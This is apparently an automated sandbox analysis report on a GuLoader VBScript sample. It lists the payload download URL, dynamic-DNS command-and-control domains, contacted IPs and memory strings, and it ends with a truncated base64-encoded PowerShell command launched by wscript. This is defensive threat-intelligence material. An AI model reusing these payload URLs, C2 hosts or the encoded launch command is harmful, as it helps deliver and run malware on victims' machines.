Source: 00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmp |
Malware Configuration Extractor: GuLoader {"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"} |
Source: PO-19903.vbs |
ReversingLabs: Detection: 19% |
Source: http://pesterbdd.com/images/Pester.png |
Avira URL Cloud: Label: malware |
Source: unknown |
HTTPS traffic detected: 148.66.138.165:443 -> 192.168.11.20:49738 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 13.107.43.13:443 -> 192.168.11.20:49739 version: TLS 1.2 |
Source: |
Binary string: $}l8C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.pdb source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp |
Source: |
Initial file: Matri11.SaveToFile FileName, adSaveCreateOverWrite |
|
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Dropped file: MILIEUFOR1.SaveToFile FileName, adSaveCreateOverWrite |
Jump to dropped file |
Source: Malware configuration extractor |
URLs: https://vegproworld.com/wp-content/Touchb.vbs |
Source: unknown |
DNS query: name: toshiba1122.ddns.net |
Source: unknown |
DNS query: name: toshiba1122.duckdns.org |
Source: Joe Sandbox View |
ASN Name: VCG-ASNG VCG-ASNG |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View |
IP Address: 13.107.43.13 13.107.43.13 |
Source: Joe Sandbox View |
IP Address: 148.66.138.165 148.66.138.165 |
Source: global traffic |
HTTP traffic detected: GET /wp-content/Touchb.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vegproworld.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: onedrive.live.comCache-Control: no-cacheCookie: MUID=20718A960FA8687F03949A000BA86C7A |
Source: global traffic |
TCP traffic: 192.168.11.20:49741 -> 194.5.98.59:3360 |
Source: global traffic |
TCP traffic: 192.168.11.20:49742 -> 197.210.226.45:3360 |
Source: global traffic |
TCP traffic: 192.168.11.20:49752 -> 197.210.226.89:3360 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4413614771.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4414053518.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4413614771.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4414053518.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.4973562589.00000000059A6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://jgdbpa.am.files.1drv.com/ |
Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://jgdbpa.am.files.1drv.com/y4maRwf2HHiC3pXkJNQF9GW7D5PTiYgoa5jSqqmo4o-s2nHza5cDyEK1j43pCU9Ua1Y |
Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4444820883.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8459529246.0000000002C3E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://jgdbpa.am.files.1drv.com/y4mstf71DnOKqqDiI505gr5x-9GCiHWv5DdrHG7ALTidojrV4lxxrd7sQ3eLTcarbaq |
Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://onedrive.live.com/ |
Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://onedrive.live.com/: |
Source: ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://onedrive.live.com/download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304 |
Source: ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://onedrive.live.com/ndows |
Source: ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://vegproworld.com/:k |
Source: ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://vegproworld.com/rj-$ |
Source: ieinstal.exe, 00000009.00000002.8457894075.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://vegproworld.com/wp-content/Touchb.vbs |
Source: unknown |
DNS traffic detected: queries for: vegproworld.com |
Source: global traffic |
HTTP traffic detected: GET /wp-content/Touchb.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vegproworld.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: onedrive.live.comCache-Control: no-cacheCookie: MUID=20718A960FA8687F03949A000BA86C7A |
Source: unknown |
HTTPS traffic detected: 148.66.138.165:443 -> 192.168.11.20:49738 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 13.107.43.13:443 -> 192.168.11.20:49739 version: TLS 1.2 |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBi |